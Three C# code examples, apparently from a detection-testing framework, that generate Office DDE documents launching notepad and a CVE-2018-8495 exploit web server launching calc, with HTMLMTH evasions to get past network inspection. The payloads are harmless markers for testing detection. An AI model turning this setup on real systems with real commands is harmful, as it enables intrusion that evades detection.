예제 #1
        // Office DDE Example
        /// <summary>
        /// Builds the "OfficeDde" attack: one Word DDE sample and one Excel DDE sample,
        /// both constructed from the same single-entry process list, registered on a
        /// <c>SamplesOutput</c> and then generated.
        /// </summary>
        /// <remarks>
        /// The only command line handed to the samples is <c>notepad</c> with an empty
        /// argument array. The resulting process name is therefore the marker to look for
        /// when the generated documents are used to check detection coverage.
        /// </remarks>
        /// <returns>The attack, after <c>Generate()</c> has been called on it.</returns>
        private static IAttack OfficeDdeExample()
        {
            // The output that collects the generated sample files.
            var sampleSink = new SamplesOutput();
            var label      = "OfficeDde";
            IOutput[] outputs = { sampleSink };
            var ddeAttack  = new Attack(outputs, name: label);

            // Command line carried by both documents: "notepad", no arguments.
            var notepadCmdLine = new Tonsil.Processes.CmdLine()
            {
                image     = @"notepad",
                arguments = new string[0]
            };
            var notepadProcess = new Tonsil.Processes.Process(notepadCmdLine);
            var commands       = new ProcessList(new[] { notepadProcess });

            // Word sample; the file name takes its extension from the sample object.
            var wordSample = new WordDDE(commands);
            var wordFile   = "WordDDE." + wordSample.Extension;
            samplesOutputAdd:
            sampleSink.Add(wordFile, wordSample);

            // Excel sample, built from the same process list.
            var excelSample = new ExcelDDE(commands);
            var excelFile   = "ExcelDDE." + excelSample.Extension;
            sampleSink.Add(excelFile, excelSample);

            ddeAttack.Generate();
            return ddeAttack;
        }
예제 #2
        /// <summary>
        /// Looks up the running processes whose name matches the image of
        /// <paramref name="targetProcess"/>.
        /// </summary>
        /// <param name="targetProcess">
        /// Process description; its <c>CmdLine.image</c> supplies the name to search for.
        /// </param>
        /// <returns>
        /// The result of <see cref="System.Diagnostics.Process.GetProcessesByName(string)"/>
        /// for the image's file name with directory and extension removed.
        /// </returns>
        /// <remarks>
        /// Matching is by process name only, so instances that were already running and
        /// are unrelated to any generated sample are returned as well. A caller that
        /// verifies or cleans up based on this array (callers are not visible here)
        /// cannot tell the two apart without an extra check such as start time or parent
        /// process. The returned <see cref="System.Diagnostics.Process"/> objects are
        /// disposable and are handed to the caller undisposed.
        /// </remarks>
        private static System.Diagnostics.Process[] GetProcesses(Tonsil.Processes.Process targetProcess)
        {
            // Going through FileInfo strips any directory part of the image path.
            string imageFileName = new System.IO.FileInfo(targetProcess.CmdLine.image).Name;

            // GetProcessesByName expects the name without an extension.
            string lookupName = System.IO.Path.GetFileNameWithoutExtension(imageFileName);

            return System.Diagnostics.Process.GetProcessesByName(lookupName);
        }
예제 #3
        /// <summary>
        /// Builds the "HtmlmthServerOutput" attack: a <c>CVE_2018_8495</c> website carrying
        /// a single <c>calc</c> command line, wrapped in an <c>HtmlmthWebsite</c> with four
        /// HTMLMTH evasions, registered on an <c>HtmlmthServerOutput</c> and then generated.
        /// </summary>
        /// <remarks>
        /// The command line is <c>calc</c> with an empty argument array, so that process
        /// name is the marker to look for when the generated server is used to test
        /// detection. The evasions are passed by name; judging by those names they alter
        /// how the page is encoded on delivery, which is what a network inspection device
        /// would have to normalise before matching (see the HTMLMTH documentation for
        /// their exact effect).
        /// </remarks>
        /// <returns>The attack, after <c>Generate()</c> has been called on it.</returns>
        private static IAttack HtmlmthServerOutputExample()
        {
            // HostnameB cannot be reused here: its port 80 is already taken by the
            // HTTP server from Sample4.
            string dnsName         = "HostnameC1";   // DNS name that points at the virtual host below
            string virtualHostName = "VirtualHostC";

            // Use the host registered under this DNS name if there is one, otherwise create it.
            var serverHost = Host.GetHostByHostName(dnsName)
                             ?? new Host(virtualHostName, dnsName, null);

            // No port is given, so the server output uses its default, port 80.
            var serverOutput = new HtmlmthServerOutput(serverHost);
            var label        = "HtmlmthServerOutput";
            IOutput[] outputs = { serverOutput };
            var serverAttack = new Attack(outputs, name: label);

            // Command line used to create a new process: "calc", no arguments.
            var calcCmdLine = new Tonsil.Processes.CmdLine()
            {
                image     = @"calc",
                arguments = new string[0]
            };
            var calcProcess = new Tonsil.Processes.Process(calcCmdLine);

            // The list of command lines; this exploit enforces a list of exactly one entry.
            var commands = new ProcessList(new[] { calcProcess });
            var website  = new CVE_2018_8495(commands);

            // Network evasions applied to the delivery of the page. The available names
            // are listed in the HTMLMTH documentation and source code.
            string[] evasions =
            {
                "htmlmth.evasions.html.entity_encoding_attributes_dec",
                "htmlmth.evasions.html.external_resource_internal_script",
                "htmlmth.evasions.html.insert_slash_after_opening_tag_names",
                "htmlmth.evasions.html.bom_declared_utf_16be_encoded_as_utf_16_be"
            };

            // The HTTP resource(s) the HTMLMTH server will host.
            var hostedSite = new HtmlmthWebsite(website, serverHost, evasions);

            // Bookkeeping: the output only generates what has been added to it.
            serverOutput.Add(hostedSite);

            serverAttack.Generate();

            // The files needed to launch the HTMLMTH server should now be under
            // $(ProjectDir)\bin\$(Configuration)\$(TargetFramework)\Output\Server\<host>\80_HTMLMTH_Server.
            // NOTE(review): the earlier comment gave <host> as HostnameB, which does not
            // match the host configured above (HostnameC1 / VirtualHostC) - confirm the
            // actual directory name.
            return serverAttack;
        }